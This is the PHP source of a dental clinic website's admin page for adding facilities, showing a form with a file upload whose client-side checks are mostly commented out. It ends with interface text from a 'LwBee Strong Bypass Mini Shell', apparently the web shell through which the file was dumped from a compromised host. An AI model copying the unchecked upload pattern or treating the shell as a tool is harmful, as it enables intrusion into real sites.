/home3/vehiclea/public_html/admin-vishnudentalclinic-com/facility.php
<?php

    session_start();
 $_SESSION['active'] = 'Facility';

  include('include/header.php');

  if(!empty($_POST{'submit'})){
    facility_insert();
  }
?>

<style type="text/css">
    .whiteBg{
        background: #e3f2fd;
        padding: 10px;
        box-shadow: 5px 5px 4px 0px  #888888;
    }
</style>

<body>

  <!-- ======= Header ======= -->
 

  <!-- ======= Sidebar ======= -->
  

  <main id="main" class="main">

 <div class="container-fluid pt-4 px-4">
             <div class="row g-6">
             <div class="col-lg-12">
                <div class="whiteBg rounded h-100 p-4">

    <div class="pagetitle">
      <h1>FACILITY</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item"><a href="dashboard.php">Home</a></li>
          <li class="breadcrumb-item active">Facility</li>
        </ol>
      </nav>
    </div><!-- End Page Title -->
    <section>
      <div class="container">
       
           <h5 class="text-center"><strong>Add Facility</strong></h5>
           <div class="row">
         <?php
            if(!empty($_GET['succ']))
          {
          ?>
            <div align="center" style="color:green;"> <h4>Data Inserted Successfully</h4></div>
            <?php
            }
         ?>
           <form method="post"  enctype="multipart/form-data" onsubmit="return Facility_validation()">
            
          
             <div class="col-md-12 mt-4">
                <label for="inputText" class="col-sm-2 col-form-label">Name</label>
                <input type="text" class="form-control" name="name" id="name">
                <div class="error" id="err1" align="center" style="color:red;"></div>
             </div>
             <div class="col-md-12 mt-4">
                <label for="inputText" class="col-sm-2 col-form-label">Description</label>
                <textarea class="form-control py-4 textarea-tiny" id="content" name="content" placeholder="Enter Content"
                      rows=10></textarea>
                      <div class="error" id="err2" align="center" style="color:red;"></div>
             </div>
             <div class="col-md-12 mt-4">
                <label for="inputText" class="col-sm-2 col-form-label">File Upload</label>
                <input class="form-control" type="file" id="formFile" name="formFile">
                <div class="error" id="err3" align="center" style="color:red;"></div>
             </div>
             <div class="col-md-12 mt-4">
                <label for="inputText" class="col-sm-2 col-form-label">Status</label>
                <select name="status" id="status" class="form-control">
                  <option value="1">Active</option>
                  <option value="2">Inactive</option>
                </select>
                
             </div>
             <center>
             <div class="col-md-6 mt-4">
               
                <input type="submit" name="submit" value="Submit" class="btn btn-primary">
             </div>
           </center>
           </form>
         
         </div>
      </div>
    </section>
  </div>
</div>
</div>
</div>

  </main><!-- End #main -->

  <?php
     include('include/footer.php');
  ?>
  <script src="https://cloud.tinymce.com/5/tinymce.min.js"></script>
<script>
tinymce.init({
selector: '.textarea-tiny',
height: 500,
menubar: false,
width: '100%',
plugins: [
// 'advlist autolink lists link image charmap print preview anchor textcolor',
// 'searchreplace visualblocks code fullscreen',
// 'insertdatetime media table paste code help wordcount'
'advlist autolink lists link image charmap print preview hr anchor pagebreak',
'searchreplace wordcount visualblocks visualchars code fullscreen',
'insertdatetime media nonbreaking save table contextmenu directionality',
'emoticons template paste textcolor colorpicker textpattern imagetools codesample toc'
],
toolbar: 'undo redo | formatselect | bold italic backcolor | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | removeformat | help',
image_advtab: true,
content_css: [
'//fonts.googleapis.com/css?family=Lato:300,300i,400,400i',
'//www.tiny.cloud/css/codepen.min.css'
]
});
</script>
<style>
div.mce-branding-powered-by{
display: none;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script>
    function Facility_validation(){
     
      var image = document.getElementById('formFile');
         if ($('name').val() == '') {
            
            valid_error("name", "Enter Facility Name", "err1");
            return false;
        }
        // else if ($('#content').val() == '') {
        //      $('#err2').hide();
        //     valid_error("content", "Enter Service Description", "err3");
        //     return false;
        // } 
      //   else if ($('#formFile').val() == '') {
      //     $('#err1').hide();
            
      //       valid_error("formFile", "Choose File", "err3");
      //       return false;
      //   }  
      
      //   else if (image.files[0].size/(1024*1024)>=1) { 
      //     valid_error("formFile", "File size must be less than 1mb", "err3");
      //     return false;
      // } 
        else
        {
           return true;
        }
    }

function valid_error(id, error, err) {

    $('.errr').html('');
    $('#' + err).show();

    $('#' + err).html(error);
    $('#' + id).focus();
    return false;
}
</script>
 
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File